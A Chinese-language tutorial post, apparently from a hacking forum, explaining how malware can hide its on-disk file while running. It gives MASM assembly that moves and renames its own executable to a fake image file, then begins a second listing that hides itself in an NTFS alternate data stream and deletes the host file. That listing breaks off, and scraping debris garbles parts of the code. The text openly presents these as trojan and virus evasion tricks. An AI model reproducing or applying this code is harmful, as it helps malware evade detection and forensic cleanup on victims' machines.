进程隐藏？干吗用？你不知道？我晕！进程隐藏技术多用于木马和病毒中（还用你说？！），用于提高其生存率。其实现 *** 因win系统架构不同而各异，一些常用 *** 资料很多，我在这里也就不多说啦！ 这里的"伪隐藏"指的是，虽然在"windows任务管理器"进程列表中可以看到其进程存在，但在硬盘中却找不到或者说不容易找到其相对应的程序文件。 一：乾坤大挪移 大家都知道，当一个程序正在运行时，win系统是不允许我们把其删除的（所以才会有人寻找程序自删除_blank>技术），但却不知大家是否注意到，在win2000中，当一个程序正在运行时，我们虽然不能把它删除，但我们却可以把程序文件在同一分区内移动位置以及重命名，你可以自己试验一下！这也就是"windows文件保护"所使用的 *** ！试想，如果我们的程序在运行后，立即把自身移动位置并重命名，而在"windows任务管理器"进程列表中显示的却还是原来的程序名，那你又该如何来查找到其对应的程序文件呢？当然如果程序在内存中没有进行变形的话，你可以利用内存查看_blank>软件（如winhex）并利用查找功能来找到相对应的程序文件，但如果程序在内存中变形，也可以说解密，使得内存映像和硬盘中的原程序文件不同，那我是暂时没法找出来啦！ 实现_blank>代码如下(ma *** )：;进程隐藏之乾坤大挪移（只能在同分区内移动）.386.model flat, stdcalloption casemap:noneinclude windows.incinclude kernel32.incincludelib kernel32.libinclude user32.incincludelib user32.lib .data?selfname db max_blank>_path dup(?) .datamovename db "c:\mm.jpg",0 .codemain:invoke getmodulefilename,null,addr selfname,max_blank>_path ;得到自身路径mov al, byte ptr selfname ;得到所在分区mov byte ptr movename,al ;修正movename，使其在同分区内移动invoke movefile,addr selfname,addr movename ;把自身移动位置并改名invoke messagebox,null,offset selfname,offset movename,mb_blank>_okinvoke exitprocess, nullend main 本例程在win2000下调试通过，xp" target=_blank>xp和win2003应该也可以，请有条件的弟兄测试，win98和winme不能用，与硬盘格式无关！二：程序自删除（仅适用于ntfs硬盘分区格式) 在ntfs分区下存在文件流早已不是什么秘密啦，但大家主要用它来隐藏文件，我在一次测试中却发现当我运行一个文件流程序时，这个文件流程序所在的宿主文件却是可以被删除的！进一步测试发现文件流程序运行时并无法直接删除这个文件流程序，只能删除宿主文件，从而来删除文件流程序。利用此特性，我们同样可以实现类似于上例的效果，且比其隐藏效果要好点。 *** 为：判断是否是ntfs格式分区，如果是则把自身复制为一个文件流，并运行复制的文件流，运行时检测到自己是存在于文件流中时就删除宿主文件。 实现_blank>代码如下(ma *** )：;进程隐藏之文件流（只能用于ntfs分区格式）.386.model flat, stdcalloption casemap:noneinclude windows.incinclude kernel32.incincludelib kernel32.libinclude user32.incincludelib user32.lib .data?selfname db max_blank>_path dup(?)szfilesystemname db 10 dup(?) .datadelname db "`.`:icyfox.exe",0;此处的"`.`:icyfox.exe"可以改为其他文件名如"cs.txt:cs.exe";我这里用"`.`"的目的是为了防止删除其他存在的文件szerr db "我不在ntfs格式的分区内，退出!",0szyes db "我在下面的流内，已被删除！",0.codemain